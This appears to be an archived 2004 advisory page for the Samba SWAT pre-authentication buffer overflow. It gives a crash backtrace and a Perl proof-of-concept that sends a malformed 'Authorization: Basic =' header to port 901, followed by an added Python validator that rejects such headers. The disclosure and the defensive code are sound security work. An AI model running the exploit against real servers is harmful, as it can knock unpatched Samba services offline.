SWAT PreAuthorization PoC

2004-07-23T00:00:00
ID SECURITYVULNS:DOC:6531
Type securityvulns
Reporter Securityvulns
Modified 2004-07-23T00:00:00

Description

Hi,

The following is brief proof-of-concept exploit code for the vulnerability mentioned in "Evgeny Demidov" <demidov@gleg.net>'s advisory: Samba 3.x SWAT preauthentication buffer overflow

Running the Perl script against a vulnerable SWAT server will cause:

Program received signal SIGSEGV, Segmentation fault.
[Switching to process 30853]
0x410957af in memcpy () from /lib/tls/libc.so.6
(gdb) bt
#0  0x410957af in memcpy () from /lib/tls/libc.so.6
#1  0xbffff340 in ?? ()
#2  0x00000001 in ?? ()
#3  0x080e34e7 in ?? ()
#4  0xbffff5e5 in ?? ()
#5  0x082919a0 in ?? ()
#6  0xffffffff in ?? ()
#7  0x080e08f0 in ?? ()
#8  0x082919a0 in ?? ()
#9  0xffffffff in ?? ()
#10 0x080e7090 in ?? ()
#11 0x0c0b8fae in ?? ()
#12 0xbffff5e5 in ?? ()
#13 0x00000000 in ?? ()
#14 0xbffff5a8 in ?? ()
#15 0x0806c97d in ?? ()
#16 0xbffff5e5 in ?? ()
#17 0x0815fd76 in ?? ()
#18 0x00000006 in ?? ()
#19 0x41150ebc in ?? () from /lib/tls/libc.so.6
#20 0x081c8480 in ?? ()
#21 0x4108ae2f in _IO_list_resetlock () from /lib/tls/libc.so.6
#22 0xbffff3b4 in ?? ()
#23 0x081c8480 in ?? ()
#24 0x081c887f in ?? ()
#25 0x00000000 in ?? ()
#26 0x00000000 in ?? ()
#27 0xbffff3b4 in ?? ()
#28 0xbffff4cc in ?? ()
#29 0x00000400 in ?? ()
#30 0x4108dda4 in mallopt () from /lib/tls/libc.so.6
#31 0xbffff3b4 in ?? ()
#32 0x08162fd9 in ?? ()
#33 0x41151888 in __after_morecore_hook () from /lib/tls/libc.so.6
#34 0x4108e3c8 in mallopt () from /lib/tls/libc.so.6
#35 0x00000000 in ?? ()

Exploit:

#!/usr/bin/perl
# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow
# Created by Noam Rathaus of Beyond Security Ltd.

use IO::Socket;
use strict;

# The target host is the only argument; SWAT listens on TCP port 901.
my $host = $ARGV[0];
die "usage: $0 <host>\n" unless defined $host;

my $remote = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => "901"
);
unless ($remote) { die "cannot connect to http daemon on $host" }
print "connected\n";
$remote->autoflush(1);

# Each header line ends in "\r" followed by the literal newline of the
# multi-line string, so the request goes out with CRLF line endings.
# The Authorization header carries the malformed Basic credential string
# that the advisory describes.
my $http = "GET / HTTP/1.1\r
Host: $host:901\r
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 Firefox/0.9.1\r
Accept: text/xml\r
Accept-Language: en-us,en;q=0.5\r
Accept-Encoding: gzip,deflate\r
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r
Keep-Alive: 300\r
Connection: keep-alive\r
Authorization: Basic =\r
\r
";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
print "Sent\n";

# Echo whatever the server sends back (nothing, if it crashed).
while (<$remote>) { print $_; }
print "\n";

close $remote;

--
Thanks
Noam Rathaus
CTO
Beyond Security Ltd.

Join the SecuriTeam community on Orkut: http://www.orkut.com/Community.aspx?cmm=44441
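The PoC above works because the credential string after "Basic " is not well-formed base64 and the server's decoder handles it badly. The following is an added example, written for this page and not part of the advisory, of Samba, or of SWAT: a strict validator for HTTP Basic Authorization headers that a reverse proxy, IDS preprocessor or log-review script can run in front of a service such as SWAT, so that credential strings which are not canonical base64 are rejected and logged with a reason before any lenient decoder sees them. The function names (`check_basic_credentials`, `scan_request`, `scan_all`), the host name `swat.example` and the sample requests are all constructed for the example; the third sample request carries the same one-character credential string the advisory's script sends.

```python
"""Strict validation of HTTP Basic Authorization headers.

Added example (not part of the advisory or of Samba): reject credential
strings that are not canonical base64 before they reach a decoder, and
name the reason so that blocked requests are easy to review afterwards.
"""
import base64
import binascii
import re

# Canonical base64: alphabet characters, then at most two '=' padding
# characters, only at the end. A string made solely of '=' does not match.
_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def check_basic_credentials(value: str):
    """Return (ok, reason) for the token that follows 'Basic ' in the header.

    Each failure mode has its own reason string so a log line can say why a
    request was rejected instead of only that it was.
    """
    if value == "":
        return False, "empty credential string"
    if not _B64_RE.match(value):
        return False, "characters outside the base64 alphabet or misplaced padding"
    if len(value) % 4 != 0:
        return False, "length not a multiple of 4"
    try:
        decoded = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False, "base64 decode failed"
    if b":" not in decoded:
        return False, "decoded credentials lack the user:password separator"
    return True, "well-formed"


def scan_request(raw: bytes):
    """Inspect the header block of one raw HTTP request.

    Returns (verdict, detail) where verdict is one of 'ok', 'malformed',
    'other-scheme' or 'no-basic-auth'.
    """
    head = raw.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, sep, val = line.partition(b":")
        if not sep or name.strip().lower() != b"authorization":
            continue
        scheme, _, token = val.strip().partition(b" ")
        if scheme.lower() != b"basic":
            return "other-scheme", scheme.decode("ascii", "replace")
        ok, reason = check_basic_credentials(token.strip().decode("ascii", "replace"))
        return ("ok" if ok else "malformed"), reason
    return "no-basic-auth", "no Authorization header"


def scan_all(requests):
    """Apply scan_request to a sequence of raw requests, preserving order."""
    return [scan_request(r) for r in requests]


# Constructed sample traffic (not captured data). Host name is fictitious.
SAMPLE_REQUESTS = [
    # well-formed credentials: "user:pass"
    b"GET / HTTP/1.1\r\nHost: swat.example:901\r\nAuthorization: Basic dXNlcjpwYXNz\r\n\r\n",
    # unauthenticated request
    b"GET / HTTP/1.1\r\nHost: swat.example:901\r\n\r\n",
    # the one-character credential string from the advisory's PoC
    b"GET / HTTP/1.1\r\nHost: swat.example:901\r\nAuthorization: Basic =\r\n\r\n",
    # valid base64 ("user") but not a user:password pair
    b"GET / HTTP/1.1\r\nHost: swat.example:901\r\nAuthorization: Basic dXNlcg==\r\n\r\n",
]

if __name__ == "__main__":
    for raw, (verdict, detail) in zip(SAMPLE_REQUESTS, scan_all(SAMPLE_REQUESTS)):
        request_line = raw.split(b"\r\n", 1)[0].decode("ascii", "replace")
        print(f"{verdict:14} {detail:62} {request_line}")
```

The checks run from cheapest to most expensive: the regular expression and the length test reject the padding-only and odd-length strings that characterise the PoC without decoding anything, and `validate=True` makes the standard library refuse any remaining non-canonical input instead of silently discarding characters the way the default lenient mode does. Rejecting at the proxy keeps the malformed string away from the application's own decoder, which is where this advisory's overflow lives.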